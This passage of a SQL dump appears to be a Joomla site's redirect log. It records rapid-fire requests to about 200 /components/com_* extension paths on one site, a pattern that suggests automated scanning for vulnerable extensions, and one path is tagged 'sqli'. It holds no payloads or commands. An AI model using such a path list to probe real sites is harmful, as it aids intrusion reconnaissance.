13:53:10','0000-00-00 00:00:00',301),(18595,'https://ekvatorprint.com.ua/components/com_giftexchange',NULL,'','',1,0,'2021-03-01 13:53:10','0000-00-00 00:00:00',301),(18596,'https://ekvatorprint.com.ua/components/com_os_cck',NULL,'','',1,0,'2021-03-01 13:53:10','0000-00-00 00:00:00',301),(18597,'https://ekvatorprint.com.ua/components/com_dirfrm',NULL,'','',1,0,'2021-03-01 13:53:11','0000-00-00 00:00:00',301),(18598,'https://ekvatorprint.com.ua/components/com_advertising',NULL,'','',1,0,'2021-03-01 13:53:11','0000-00-00 00:00:00',301),(18599,'https://ekvatorprint.com.ua/components/com_acstartseite',NULL,'','',1,0,'2021-03-01 13:53:11','0000-00-00 00:00:00',301),(18600,'https://ekvatorprint.com.ua/components/com_pazzari_vm3',NULL,'','',1,0,'2021-03-01 13:53:11','0000-00-00 00:00:00',301),(18601,'https://ekvatorprint.com.ua/components/com_foobla_suggestions',NULL,'','',1,0,'2021-03-01 13:53:11','0000-00-00 00:00:00',301),(18602,'https://ekvatorprint.com.ua/components/com_jombib',NULL,'','',1,0,'2021-03-01 13:53:12','0000-00-00 00:00:00',301),(18603,'https://ekvatorprint.com.ua/components/com_vmap',NULL,'','',1,0,'2021-03-01 13:53:12','0000-00-00 00:00:00',301),(18604,'https://ekvatorprint.com.ua/components/com_tech_article',NULL,'','',1,0,'2021-03-01 13:53:12','0000-00-00 00:00:00',301),(18605,'https://ekvatorprint.com.ua/components/com_magazine_3_0_1',NULL,'','',1,0,'2021-03-01 13:53:12','0000-00-00 00:00:00',301),(18606,'https://ekvatorprint.com.ua/components/com_nge',NULL,'','',1,0,'2021-03-01 13:53:13','0000-00-00 00:00:00',301),(18607,'https://ekvatorprint.com.ua/components/com_jsubscription',NULL,'','',1,0,'2021-03-01 13:53:13','0000-00-00 00:00:00',301),(18608,'https://ekvatorprint.com.ua/components/com_jjgallery',NULL,'','',1,0,'2021-03-01 13:53:13','0000-00-00 00:00:00',301),(18609,'https://ekvatorprint.com.ua/components/com_ongumatimesheet20',NULL,'','',1,0,'2021-03-01 13:53:13','0000-00-00 00:00:00',301),(18610,'https://ekvatorprint.com.ua/components/com_jomdirectory',NULL,'','',1,0,'2021-03-01 13:53:13','0000-00-00 00:00:00',301),(18611,'https://ekvatorprint.com.ua/components/com_na',NULL,'','',1,0,'2021-03-01 13:53:14','0000-00-00 00:00:00',301),(18612,'https://ekvatorprint.com.ua/components/com_myfiles',NULL,'','',1,0,'2021-03-01 13:53:14','0000-00-00 00:00:00',301),(18613,'https://ekvatorprint.com.ua/components/com_smslist',NULL,'','',1,0,'2021-03-01 13:53:14','0000-00-00 00:00:00',301),(18614,'https://ekvatorprint.com.ua/components/com_wgpicasa',NULL,'','',1,0,'2021-03-01 13:53:14','0000-00-00 00:00:00',301),(18615,'https://ekvatorprint.com.ua/components/com_packages',NULL,'','',1,0,'2021-03-01 13:53:15','0000-00-00 00:00:00',301),(18616,'https://ekvatorprint.com.ua/components/com_hello',NULL,'','',1,0,'2021-03-01 13:53:15','0000-00-00 00:00:00',301),(18617,'https://ekvatorprint.com.ua/components/com_myhome',NULL,'','',1,0,'2021-03-01 13:53:15','0000-00-00 00:00:00',301),(18618,'https://ekvatorprint.com.ua/components/com_myform',NULL,'','',1,0,'2021-03-01 13:53:15','0000-00-00 00:00:00',301),(18619,'https://ekvatorprint.com.ua/components/com_joomtracker',NULL,'','',1,0,'2021-03-01 13:53:15','0000-00-00 00:00:00',301),(18620,'https://ekvatorprint.com.ua/components/com_osservicesbooking',NULL,'','',1,0,'2021-03-01 13:53:16','0000-00-00 00:00:00',301),(18621,'https://ekvatorprint.com.ua/components/com_jvideo',NULL,'','',1,0,'2021-03-01 13:53:16','0000-00-00 00:00:00',301),(18622,'https://ekvatorprint.com.ua/components/com_liveticker',NULL,'','',1,0,'2021-03-01 13:53:16','0000-00-00 00:00:00',301),(18623,'https://ekvatorprint.com.ua/components/com_jtagminicart',NULL,'','',1,0,'2021-03-01 13:53:16','0000-00-00 00:00:00',301),(18624,'https://ekvatorprint.com.ua/components/com_billyportfolio',NULL,'','',1,0,'2021-03-01 13:53:17','0000-00-00 00:00:00',301),(18625,'https://ekvatorprint.com.ua/components/com_jssupportticket)',NULL,'','',1,0,'2021-03-01 13:53:17','0000-00-00 00:00:00',301),(18626,'https://ekvatorprint.com.ua/components/com_be_it_easypartner',NULL,'','',1,0,'2021-03-01 13:53:17','0000-00-00 00:00:00',301),(18627,'https://ekvatorprint.com.ua/components/com_joomla',NULL,'','',1,0,'2021-03-01 13:53:17','0000-00-00 00:00:00',301),(18628,'https://ekvatorprint.com.ua/components/com_thyme',NULL,'','',1,0,'2021-03-01 13:53:17','0000-00-00 00:00:00',301),(18629,'https://ekvatorprint.com.ua/components/com_recly',NULL,'','',1,0,'2021-03-01 13:53:18','0000-00-00 00:00:00',301),(18630,'https://ekvatorprint.com.ua/components/com_tpdugg',NULL,'','',1,0,'2021-03-01 13:53:18','0000-00-00 00:00:00',301),(18631,'https://ekvatorprint.com.ua/components/com_vikrealestate',NULL,'','',1,0,'2021-03-01 13:53:18','0000-00-00 00:00:00',301),(18632,'https://ekvatorprint.com.ua/components/com_rand',NULL,'','',1,0,'2021-03-01 13:53:18','0000-00-00 00:00:00',301),(18633,'https://ekvatorprint.com.ua/components/com_sanpham',NULL,'','',1,0,'2021-03-01 13:53:19','0000-00-00 00:00:00',301),(18634,'https://ekvatorprint.com.ua/components/com_videogallery',NULL,'','',1,0,'2021-03-01 13:53:19','0000-00-00 00:00:00',301),(18635,'https://ekvatorprint.com.ua/components/com_jeux',NULL,'','',1,0,'2021-03-01 13:53:19','0000-00-00 00:00:00',301),(18636,'https://ekvatorprint.com.ua/components/com_djartgallery',NULL,'','',1,0,'2021-03-01 13:53:19','0000-00-00 00:00:00',301),(18637,'https://ekvatorprint.com.ua/components/com_utchat',NULL,'','',1,0,'2021-03-01 13:53:19','0000-00-00 00:00:00',301),(18638,'https://ekvatorprint.com.ua/components/com_registration',NULL,'','',1,0,'2021-03-01 13:53:20','0000-00-00 00:00:00',301),(18639,'https://ekvatorprint.com.ua/components/com_linkdirectory',NULL,'','',1,0,'2021-03-01 13:53:20','0000-00-00 00:00:00',301),(18640,'https://ekvatorprint.com.ua/components/com_referenzen',NULL,'','',1,0,'2021-03-01 13:53:20','0000-00-00 00:00:00',301),(18641,'https://ekvatorprint.com.ua/components/com_mp3_allopass',NULL,'','',1,0,'2021-03-01 13:53:20','0000-00-00 00:00:00',301),(18642,'https://ekvatorprint.com.ua/components/com_rpl',NULL,'','',1,0,'2021-03-01 13:53:21','0000-00-00 00:00:00',301),(18643,'https://ekvatorprint.com.ua/components/com_forme',NULL,'','',1,0,'2021-03-01 13:53:21','0000-00-00 00:00:00',301),(18644,'https://ekvatorprint.com.ua/components/com_elite',NULL,'','',1,0,'2021-03-01 13:53:21','0000-00-00 00:00:00',301),(18645,'https://ekvatorprint.com.ua/components/com_ccboard',NULL,'','',1,0,'2021-03-01 13:53:21','0000-00-00 00:00:00',301),(18646,'https://ekvatorprint.com.ua/components/com_ecommercewd',NULL,'','',1,0,'2021-03-01 13:53:21','0000-00-00 00:00:00',301),(18647,'https://ekvatorprint.com.ua/components/com_ircmbasic',NULL,'','',1,0,'2021-03-01 13:53:22','0000-00-00 00:00:00',301),(18648,'https://ekvatorprint.com.ua/components/com__brightweblinks',NULL,'','',1,0,'2021-03-01 13:53:22','0000-00-00 00:00:00',301),(18649,'https://ekvatorprint.com.ua/components/com_sportspredictions',NULL,'','',1,0,'2021-03-01 13:53:22','0000-00-00 00:00:00',301),(18650,'https://ekvatorprint.com.ua/components/com_joomlaxplorer',NULL,'','',1,0,'2021-03-01 13:53:23','0000-00-00 00:00:00',301),(18651,'https://ekvatorprint.com.ua/components/com_chronocontact',NULL,'','',1,0,'2021-03-01 13:53:23','0000-00-00 00:00:00',301),(18652,'https://ekvatorprint.com.ua/components/com_yellowpages',NULL,'','',1,0,'2021-03-01 13:53:23','0000-00-00 00:00:00',301),(18653,'https://ekvatorprint.com.ua/components/com_jphone',NULL,'','',1,0,'2021-03-01 13:53:23','0000-00-00 00:00:00',301),(18654,'https://ekvatorprint.com.ua/components/com_lexikon',NULL,'','',1,0,'2021-03-01 13:53:24','0000-00-00 00:00:00',301),(18655,'https://ekvatorprint.com.ua/components/com_parcoauto',NULL,'','',1,0,'2021-03-01 13:53:24','0000-00-00 00:00:00',301),(18656,'https://ekvatorprint.com.ua/components/com_doqment',NULL,'','',1,0,'2021-03-01 13:53:24','0000-00-00 00:00:00',301),(18657,'https://ekvatorprint.com.ua/components/com_myproject',NULL,'','',1,0,'2021-03-01 13:53:24','0000-00-00 00:00:00',301),(18658,'https://ekvatorprint.com.ua/components/com_na_qforms',NULL,'','',1,0,'2021-03-01 13:53:25','0000-00-00 00:00:00',301),(18659,'https://ekvatorprint.com.ua/components/com_prod',NULL,'','',1,0,'2021-03-01 13:53:25','0000-00-00 00:00:00',301),(18660,'https://ekvatorprint.com.ua/components/com_realestatemanager',NULL,'','',1,0,'2021-03-01 13:53:25','0000-00-00 00:00:00',301),(18661,'https://ekvatorprint.com.ua/components/com_huruhelpdesk',NULL,'','',1,0,'2021-03-01 13:53:25','0000-00-00 00:00:00',301),(18662,'https://ekvatorprint.com.ua/components/com_ninjamonial',NULL,'','',1,0,'2021-03-01 13:53:25','0000-00-00 00:00:00',301),(18663,'https://ekvatorprint.com.ua/components/com_facegallery',NULL,'','',1,0,'2021-03-01 13:53:26','0000-00-00 00:00:00',301),(18664,'https://ekvatorprint.com.ua/components/com_k2ajaxsearch',NULL,'','',1,0,'2021-03-01 13:53:26','0000-00-00 00:00:00',301),(18665,'https://ekvatorprint.com.ua/components/com_spain',NULL,'','',1,0,'2021-03-01 13:53:26','0000-00-00 00:00:00',301),(18666,'https://ekvatorprint.com.ua/components/com_jcafe',NULL,'','',1,0,'2021-03-01 13:53:26','0000-00-00 00:00:00',301),(18667,'https://ekvatorprint.com.ua/components/com_fbb',NULL,'','',1,0,'2021-03-01 13:53:27','0000-00-00 00:00:00',301),(18668,'https://ekvatorprint.com.ua/components/com_jlike',NULL,'','',1,0,'2021-03-01 13:53:27','0000-00-00 00:00:00',301),(18669,'https://ekvatorprint.com.ua/components/com_jphoto',NULL,'','',1,0,'2021-03-01 13:53:27','0000-00-00 00:00:00',301),(18670,'https://ekvatorprint.com.ua/components/com_vxdate',NULL,'','',1,0,'2021-03-01 13:53:27','0000-00-00 00:00:00',301),(18671,'https://ekvatorprint.com.ua/components/com_jobgroklist',NULL,'','',1,0,'2021-03-01 13:53:28','0000-00-00 00:00:00',301),(18672,'https://ekvatorprint.com.ua/components/com_acajoom',NULL,'','',1,0,'2021-03-01 13:53:28','0000-00-00 00:00:00',301),(18673,'https://ekvatorprint.com.ua/components/com_diary',NULL,'','',1,0,'2021-03-01 13:53:28','0000-00-00 00:00:00',301),(18674,'https://ekvatorprint.com.ua/components/com_canteen',NULL,'','',1,0,'2021-03-01 13:53:28','0000-00-00 00:00:00',301),(18675,'https://ekvatorprint.com.ua/components/com_beeheard',NULL,'','',1,0,'2021-03-01 13:53:29','0000-00-00 00:00:00',301),(18676,'https://ekvatorprint.com.ua/components/com_yvcomment',NULL,'','',1,0,'2021-03-01 13:53:29','0000-00-00 00:00:00',301),(18677,'https://ekvatorprint.com.ua/components/com_jbpeople',NULL,'','',1,0,'2021-03-01 13:53:29','0000-00-00 00:00:00',301),(18678,'https://ekvatorprint.com.ua/components/com_alameda',NULL,'','',1,0,'2021-03-01 13:53:29','0000-00-00 00:00:00',301),(18679,'https://ekvatorprint.com.ua/components/com_acteammember',NULL,'','',1,0,'2021-03-01 13:53:29','0000-00-00 00:00:00',301),(18680,'https://ekvatorprint.com.ua/components/com_jobline',NULL,'','',1,0,'2021-03-01 13:53:30','0000-00-00 00:00:00',301),(18681,'https://ekvatorprint.com.ua/components/com_addressbook',NULL,'','',1,0,'2021-03-01 13:53:30','0000-00-00 00:00:00',301),(18682,'https://ekvatorprint.com.ua/components/com_adagency',NULL,'','',1,0,'2021-03-01 13:53:30','0000-00-00 00:00:00',301),(18683,'https://ekvatorprint.com.ua/components/com_tour_toto',NULL,'','',1,0,'2021-03-01 13:53:30','0000-00-00 00:00:00',301),(18684,'https://ekvatorprint.com.ua/components/com_preventive',NULL,'','',1,0,'2021-03-01 13:53:31','0000-00-00 00:00:00',301),(18685,'https://ekvatorprint.com.ua/components/com_jacomment',NULL,'','',1,0,'2021-03-01 13:53:31','0000-00-00 00:00:00',301),(18686,'https://ekvatorprint.com.ua/components/com_googlemaplocator',NULL,'','',1,0,'2021-03-01 13:53:31','0000-00-00 00:00:00',301),(18687,'https://ekvatorprint.com.ua/components/com_docmanpaypal',NULL,'','',1,0,'2021-03-01 13:53:31','0000-00-00 00:00:00',301),(18688,'https://ekvatorprint.com.ua/components/com_extcalendar',NULL,'','',1,0,'2021-03-01 13:53:31','0000-00-00 00:00:00',301),(18689,'https://ekvatorprint.com.ua/components/com_jesectionfinder',NULL,'','',1,0,'2021-03-01 13:53:32','0000-00-00 00:00:00',301),(18690,'https://ekvatorprint.com.ua/components/com_threate',NULL,'','',1,0,'2021-03-01 13:53:32','0000-00-00 00:00:00',301),(18691,'https://ekvatorprint.com.ua/components/com_abook',NULL,'','',1,0,'2021-03-01 13:53:32','0000-00-00 00:00:00',301),(18692,'https://ekvatorprint.com.ua/components/com_wines',NULL,'','',1,0,'2021-03-01 13:53:32','0000-00-00 00:00:00',301),(18693,'https://ekvatorprint.com.ua/components/com_simpledownload',NULL,'','',1,0,'2021-03-01 13:53:33','0000-00-00 00:00:00',301),(18694,'https://ekvatorprint.com.ua/components/com_userextranet',NULL,'','',1,0,'2021-03-01 13:53:33','0000-00-00 00:00:00',301),(18695,'https://ekvatorprint.com.ua/components/com_joomblog',NULL,'','',1,0,'2021-03-01 13:53:33','0000-00-00 00:00:00',301),(18696,'https://ekvatorprint.com.ua/components/com_maqmahelpdesk',NULL,'','',1,0,'2021-03-01 13:53:33','0000-00-00 00:00:00',301),(18697,'https://ekvatorprint.com.ua/components/com_vikrentcar',NULL,'','',1,0,'2021-03-01 13:53:33','0000-00-00 00:00:00',301),(18698,'https://ekvatorprint.com.ua/components/com_lm',NULL,'','',1,0,'2021-03-01 13:53:34','0000-00-00 00:00:00',301),(18699,'https://ekvatorprint.com.ua/components/com_picsell',NULL,'','',1,0,'2021-03-01 13:53:34','0000-00-00 00:00:00',301),(18700,'https://ekvatorprint.com.ua/components/com_jtips',NULL,'','',1,0,'2021-03-01 13:53:34','0000-00-00 00:00:00',301),(18701,'https://ekvatorprint.com.ua/components/com_invitex',NULL,'','',1,0,'2021-03-01 13:53:34','0000-00-00 00:00:00',301),(18702,'https://ekvatorprint.com.ua/components/com_mediaslide',NULL,'','',1,0,'2021-03-01 13:53:35','0000-00-00 00:00:00',301),(18703,'https://ekvatorprint.com.ua/components/com_mambowiki',NULL,'','',1,0,'2021-03-01 13:53:35','0000-00-00 00:00:00',301),(18704,'https://ekvatorprint.com.ua/components/com_component',NULL,'','',1,0,'2021-03-01 13:53:35','0000-00-00 00:00:00',301),(18705,'https://ekvatorprint.com.ua/components/com_ijoomla_archive',NULL,'','',2,0,'2021-03-01 13:53:35','0000-00-00 00:00:00',301),(18706,'https://ekvatorprint.com.ua/components/com_altas',NULL,'','',1,0,'2021-03-01 13:53:36','0000-00-00 00:00:00',301),(18707,'https://ekvatorprint.com.ua/components/com_jvideoclip',NULL,'','',1,0,'2021-03-01 13:53:36','0000-00-00 00:00:00',301),(18708,'https://ekvatorprint.com.ua/components/com_realpin',NULL,'','',1,0,'2021-03-01 13:53:36','0000-00-00 00:00:00',301),(18709,'https://ekvatorprint.com.ua/components/com_registrationpro',NULL,'','',1,0,'2021-03-01 13:53:36','0000-00-00 00:00:00',301),(18710,'https://ekvatorprint.com.ua/components/com_k2store',NULL,'','',1,0,'2021-03-01 13:53:36','0000-00-00 00:00:00',301),(18711,'https://ekvatorprint.com.ua/components/com_bfquiz_sqli',NULL,'','',1,0,'2021-03-01 13:53:37','0000-00-00 00:00:00',301),(18712,'https://ekvatorprint.com.ua/components/com_projectfork',NULL,'','',2,0,'2021-03-01 13:53:37','0000-00-00 00:00:00',301),(18713,'https://ekvatorprint.com.ua/components/com_jdbexport',NULL,'','',1,0,'2021-03-01 13:53:37','0000-00-00 00:00:00',301),(18714,'https://ekvatorprint.com.ua/components/com_xcomp',NULL,'','',1,0,'2021-03-01 13:53:37','0000-00-00 00:00:00',301),(18715,'https://ekvatorprint.com.ua/components/com_neogallery',NULL,'','',1,0,'2021-03-01 13:53:38','0000-00-00 00:00:00',301),(18716,'https://ekvatorprint.com.ua/components/com_ekrishta',NULL,'','',1,0,'2021-03-01 13:53:38','0000-00-00 00:00:00',301),(18717,'https://ekvatorprint.com.ua/components/com_adds',NULL,'','',1,0,'2021-03-01 13:53:38','0000-00-00 00:00:00',301),(18718,'https://ekvatorprint.com.ua/components/com_hbssearch',NULL,'','',1,0,'2021-03-01 13:53:38','0000-00-00 00:00:00',301),(18719,'https://ekvatorprint.com.ua/components/com_aprice',NULL,'','',1,0,'2021-03-01 13:53:38','0000-00-00 00:00:00',301),(18720,'https://ekvatorprint.com.ua/components/com_lms',NULL,'','',1,0,'2021-03-01 13:53:39','0000-00-00 00:00:00',301),(18721,'https://ekvatorprint.com.ua/components/com_smestorage',NULL,'','',1,0,'2021-03-01 13:53:39','0000-00-00 00:00:00',301),(18722,'https://ekvatorprint.com.ua/components/com_newssearch',NULL,'','',1,0,'2021-03-01 13:53:39','0000-00-00 00:00:00',301),(18723,'https://ekvatorprint.com.ua/components/com_mojo',NULL,'','',1,0,'2021-03-01 13:53:39','0000-00-00 00:00:00',301),(18724,'https://ekvatorprint.com.ua/components/com_iproperty',NULL,'','',1,0,'2021-03-01 13:53:40','0000-00-00 00:00:00',301),(18725,'https://ekvatorprint.com.ua/components/com_rsform',NULL,'','',1,0,'2021-03-01 13:53:40','0000-00-00 00:00:00',301),(18726,'https://ekvatorprint.com.ua/components/com_simgenealogy',NULL,'','',1,0,'2021-03-01 13:53:40','0000-00-00 00:00:00',301),(18727,'https://ekvatorprint.com.ua/components/com_jsautoz',NULL,'','',1,0,'2021-03-01 13:53:40','0000-00-00 00:00:00',301),(18728,'https://ekvatorprint.com.ua/components/com_radio',NULL,'','',1,0,'2021-03-01 13:53:40','0000-00-00 00:00:00',301),(18729,'https://ekvatorprint.com.ua/components/com_ornekek',NULL,'','',1,0,'2021-03-01 13:53:41','0000-00-00 00:00:00',301),(18730,'https://ekvatorprint.com.ua/components/com_furniture',NULL,'','',1,0,'2021-03-01 13:53:41','0000-00-00 00:00:00',301),(18731,'https://ekvatorprint.com.ua/components/com_jedirectory',NULL,'','',1,0,'2021-03-01 13:53:41','0000-00-00 00:00:00',301),(18732,'https://ekvatorprint.com.ua/components/com_gameserver',NULL,'','',1,0,'2021-03-01 13:53:41','0000-00-00 00:00:00',301),(18733,'https://ekvatorprint.com.ua/components/com_rd_download',NULL,'','',1,0,'2021-03-01 13:53:42','0000-00-00 00:00:00',301),(18734,'https://ekvatorprint.com.ua/components/com_bfsurvey_basic',NULL,'','',1,0,'2021-03-01 13:53:42','0000-00-00 00:00:00',301),(18735,'https://ekvatorprint.com.ua/components/com_dailymessage',NULL,'','',1,0,'2021-03-01 13:53:42','0000-00-00 00:00:00',301),(18736,'https://ekvatorprint.com.ua/components/com_itarmory',NULL,'','',1,0,'2021-03-01 13:53:42','0000-00-00 00:00:00',301),(18737,'https://ekvatorprint.com.ua/components/com_calendario',NULL,'','',1,0,'2021-03-01 13:53:42','0000-00-00 00:00:00',301),(18738,'https://ekvatorprint.com.ua/components/com_onlineflashquiz',NULL,'','',1,0,'2021-03-01 13:53:43','0000-00-00 00:00:00',301),(18739,'https://ekvatorprint.com.ua/components/com_joomlaoads',NULL,'','',1,0,'2021-03-01 13:53:43','0000-00-00 00:00:00',301),(18740,'https://ekvatorprint.com.ua/components/com_wdsubscriptions',NULL,'','',1,0,'2021-03-01 13:53:43','0000-00-00 00:00:00',301),(18741,'https://ekvatorprint.com.ua/components/com_clan_members',NULL,'','',1,0,'2021-03-01 13:53:43','0000-00-00 00:00:00',301),(18742,'https://ekvatorprint.com.ua/components/com_jshop',NULL,'','',1,0,'2021-03-01 13:53:44','0000-00-00 00:00:00',301),(18743,'https://ekvatorprint.com.ua/components/com_market',NULL,'','',1,0,'2021-03-01 13:53:44','0000-00-00 00:00:00',301),(18744,'https://ekvatorprint.com.ua/components/com_jbusinessdirectory',NULL,'','',1,0,'2021-03-01 13:53:44','0000-00-00 00:00:00',301),(18745,'https://ekvatorprint.com.ua/components/com_imoti',NULL,'','',1,0,'2021-03-01 13:53:44','0000-00-00 00:00:00',301),(18746,'https://ekvatorprint.com.ua/components/com_rsbook_15',NULL,'','',1,0,'2021-03-01 13:53:44','0000-00-00 00:00:00',301),(18747,'https://ekvatorprint.com.ua/components/com_easy_youtube_gallery',NULL,'','',1,0,'2021-03-01 13:53:45','0000-00-00 00:00:00',301),(18748,'https://ekvatorprint.com.ua/components/com_breezingforms',NULL,'','',1,0,'2021-03-01 13:53:45','0000-00-00 00:00:00',301),(18749,'https://ekvatorprint.com.ua/components/com_tophotelmodule',NULL,'','',1,0,'2021-03-01 13:53:45','0000-00-00 00:00:00',301),(18750,'https://ekvatorprint.com.ua/components/com_mediamall',NULL,'','',1,0,'2021-03-01 13:53:45','0000-00-00 00:00:00',301),(18751,'https://ekvatorprint.com.ua/components/com_wmtportfolio',NULL,'','',1,0,'2021-03-01 13:53:46','0000-00-00 00:00:00',301),(18752,'https://ekvatorprint.com.ua/components/com_ponygallery',NULL,'','',1,0,'2021-03-01 13:53:46','0000-00-00 00:00:00',301),(18753,'https://ekvatorprint.com.ua/components/com_artist',NULL,'','',1,0,'2021-03-01 13:53:46','0000-00-00 00:00:00',301),(18754,'https://ekvatorprint.com.ua/components/com_xcloner',NULL,'','',1,0,'2021-03-01 13:53:46','0000-00-00 00:00:00',301),(18755,'https://ekvatorprint.com.ua/components/com_sef',NULL,'','',1,0,'2021-03-01 13:53:46','0000-00-00 00:00:00',301),(18756,'https://ekvatorprint.com.ua/components/com_tienda',NULL,'','',1,0,'2021-03-01 13:53:47','0000-00-00 00:00:00',301),(18757,'https://ekvatorprint.com.ua/components/com_voj',NULL,'','',1,0,'2021-03-01 13:53:47','0000-00-00 00:00:00',301),(18758,'https://ekvatorprint.com.ua/components/com_youtube',NULL,'','',1,0,'2021-03-01 13:53:47','0000-00-00 00:00:00',301),(18759,'https://ekvatorprint.com.ua/components/com_civicrm',NULL,'','',1,0,'2021-03-01 13:53:47','0000-00-00 00:00:00',301),(18760,'https://ekvatorprint.com.ua/components/com_jgrid',NULL,'','',1,0,'2021-03-01 13:53:48','0000-00-00 00:00:00',301),(18761,'https://ekvatorprint.com.ua/components/com_mosforms',NULL,'','',1,0,'2021-03-01 13:53:48','0000-00-00 00:00:00',301),(18762,'https://ekvatorprint.com.ua/components/com_fastball',NULL,'','',1,0,'2021-03-01 13:53:48','0000-00-00 00:00:00',301),(18763,'https://ekvatorprint.com.ua/components/com_jegallery',NULL,'','',1,0,'2021-03-01 13:53:48','0000-00-00 00:00:00',301),(18764,'https://ekvatorprint.com.ua/components/com_hikasho',NULL,'','',1,0,'2021-03-01 13:53:48','0000-00-00 00:00:00',301),(18765,'https://ekvatorprint.com.ua/components/com_bca',NULL,'','',1,0,'2021-03-01 13:53:49','0000-00-00 00:00:00',301),(18766,'https://ekvatorprint.com.ua/components/com_marketplace',NULL,'','',2,0,'2021-03-01 13:53:49','0000-00-00 00:00:00',301),(18767,'https://ekvatorprint.com.ua/components/com_jobads',NULL,'','',1,0,'2021-03-01 13:53:49','0000-00-00 00:00:00',301),(18768,'https://ekvatorprint.com.ua/components/com_carman',NULL,'','',1,0,'2021-03-01 13:53:49','0000-00-00 00:00:00',301),(18769,'https://ekvatorprint.com.ua/components/com_jomcomdev',NULL,'','',1,0,'2021-03-01 13:53:50','0000-00-00 00:00:00',301),(18770,'https://ekvatorprint.com.ua/components/com_book',NULL,'','',1,0,'2021-03-01 13:53:50','0000-00-00 00:00:00',301),(18771,'https://ekvatorprint.com.ua/components/com_memorix',NULL,'','',1,0,'2021-03-01 13:53:50','0000-00-00 00:00:00',301),(18772,'https://ekvatorprint.com.ua/components/com_articlemanager',NULL,'','',1,0,'2021-03-01 13:53:51','0000-00-00 00:00:00',301),(18773,'https://ekvatorprint.com.ua/components/com_treeg',NULL,'','',1,0,'2021-03-01 13:53:51','0000-00-00 00:00:00',301),(18774,'https://ekvatorprint.com.ua/components/com_galleryxml',NULL,'','',1,0,'2021-03-01 13:53:51','0000-00-00 00:00:00',301),(18775,'https://ekvatorprint.com.ua/components/com_jreservation',NULL,'','',1,0,'2021-03-01 13:53:51','0000-00-00 00:00:00',301),(18776,'https://ekvatorprint.com.ua/components/com_fq',NULL,'','',1,0,'2021-03-01 13:53:51','0000-00-00 00:00:00',301),(18777,'https://ekvatorprint.com.ua/components/com_jpad',NULL,'','',1,0,'2021-03-01 13:53:52','0000-00-00 00:00:00',301),(18778,'https://ekvatorprint.com.ua/components/com_easydiscuss',NULL,'','',1,0,'2021-03-01 13:53:52','0000-00-00 00:00:00',301),(18779,'https://ekvatorprint.com.ua/components/com_sbsfile',NULL,'','',1,0,'2021-03-01 13:53:52','0000-00-00 00:00:00',301),(18780,'https://ekvatorprint.com.ua/components/com_abc',NULL,'','',1,0,'2021-03-01 13:53:52','0000-00-00 00:00:00',301),(18781,'https://ekvatorprint.com.ua/components/com_dbquery',NULL,'','',1,0,'2021-03-01 13:53:53','0000-00-00 00:00:00',301),(18782,'https://ekvatorprint.com.ua/components/com_djcatalog',NULL,'','',1,0,'2021-03-01 13:53:53','0000-00-00 00:00:00',301),(18783,'https://ekvatorprint.com.ua/components/com_autartimonial',NULL,'','',1,0,'2021-03-01 13:53:53','0000-00-00 00:00:00',301),(18784,'https://ekvatorprint.com.ua/components/com_jeclassifieds',NULL,'','',1,0,'2021-03-01 13:53:53','0000-00-00 00:00:00',301),(18785,'https://ekvatorprint.com.ua/components/com_sectionex',NULL,'','',1,0,'2021-03-01 13:53:53','0000-00-00 00:00:00',301),(18786,'https://ekvatorprint.com.ua/components/com_salesrep',NULL,'','',1,0,'2021-03-01 13:53:54','0000-00-00 00:00:00',301),(18787,'https://ekvatorprint.com.ua/components/com_topmenu',NULL,'','',1,0,'2021-03-01 13:53:54','0000-00-00 00:00:00',301),(18788,'https://ekvatorprint.com.ua/components/com_jcomments',NULL,'','',1,0,'2021-03-01 13:53:54','0000-00-00 00:00:00',301),(18789,'https://ekvatorprint.com.ua/components/com_solidres',NULL,'','',1,0,'2021-03-01 13:53:54','0000-00-00 00:00:00',301),(18790,'https://ekvatorprint.com.ua/components/com_units',NULL,'','',1,0,'2021-03-01 13:53:55','0000-00-00 00:00:00',301),(18791,'https://ekvatorprint.com.ua/components/com_football',NULL,'','',1,0,'2021-03-01 13:53:55','0000-00-00 00:00:00',301),(18792,'https://ekvatorprint.com.ua/components/com_booklibrary',NULL,'','',1,0,'2021-03-01 13:53:55','0000-00-00 00:00:00',301),(18793,'https://ekvatorprint.com.ua/components/com_janews',NULL,'','',1,0,'2021-03-01 13:53:55','0000-00-00 00:00:00',301),(18794,'https://ekvatorprint.com.ua/components/com_buslicense',NULL,'','',1,0,'2021-03-01 13:53:55','0000-00-00 00:00:00',301),(18795,'https://ekvatorprint.com.ua/components/com_press',NULL,'','',1,0,'2021-03-01 13:53:56','0000-00-00 00:00:00',301),(18796,'https://ekvatorprint.com.ua/components/com_sgicatalog',NULL,'','',1,0,'2021-03-01 13:53:56','0000-00-00 00:00:00',301),(18797,'https://ekvatorprint.com.ua/components/com_groupjive',NULL,'','',1,0,'2021-03-01 13:53:56','0000-00-00 00:00:00',301),(18798,'https://ekvatorprint.com.ua/components/com_mycar',NULL,'','',1,0,'2021-03-01 13:53:56','0000-00-00 00:00:00',301),(18799,'https://ekvatorprint.com.ua/components/com_rsappt_pro3',NULL,'','',1,0,'2021-03-01 13:53:57','0000-00-00 00:00:00',301),(18800,'https://ekvatorprint.com.ua/components/com_ccnewsletter',NULL,'','',1,0,'2021-03-01 13:53:57','0000-00-00 00:00:00',301),(18801,'https://ekvatorprint.com.ua/components/com_as',NULL,'','',1,0,'2021-03-01 13:53:57','0000-00-00 00:00:00',301),(18802,'https://ekvatorprint.com.ua/components/com_filecabinet',NULL,'','',1,0,'2021-03-01 13:53:57','0000-00-00 00:00:00',301),(18803,'https://ekvatorprint.com.ua/components/com_lmsking',NULL,'','',1,0,'2021-03-01 13:53:58','0000-00-00 00:00:00',301),(18804,'https://ekvatorprint.com.ua/components/com_fantasytournament',NULL,'','',1,0,'2021-03-01 13:53:58','0000-00-00 00:00:00',301),(18805,'https://ekvatorprint.com.ua/components/com_jbook',NULL,'','',1,0,'2021-03-01 13:53:58','0000-00-00 00:00:00',301),(18806,'https://ekvatorprint.com.ua/components/com_joomanager',NULL,'','',2,0,'2021-03-01 13:53:58','0000-00-00 00:00:00',301),(18807,'https://ekvatorprint.com.ua/components/com_hdvideoshare',NULL,'','',1,0,'2021-03-01 13:53:58','0000-00-00 00:00:00',301),(18808,'https://ekvatorprint.com.ua/components/com_gbufacebook',NULL,'','',1,0,'2021-03-01 13:53:59','0000-00-00 00:00:00',301),(18809,'https://ekvatorprint.com.ua/components/com_ab',NULL,'','',1,0,'2021-03-01 13:53:59','0000-00-00 00:00:00',301),(18810,'https://ekvatorprint.com.ua/components/com_ajaxquiz',NULL,'','',1,0,'2021-03-01 13:53:59','0000-00-00 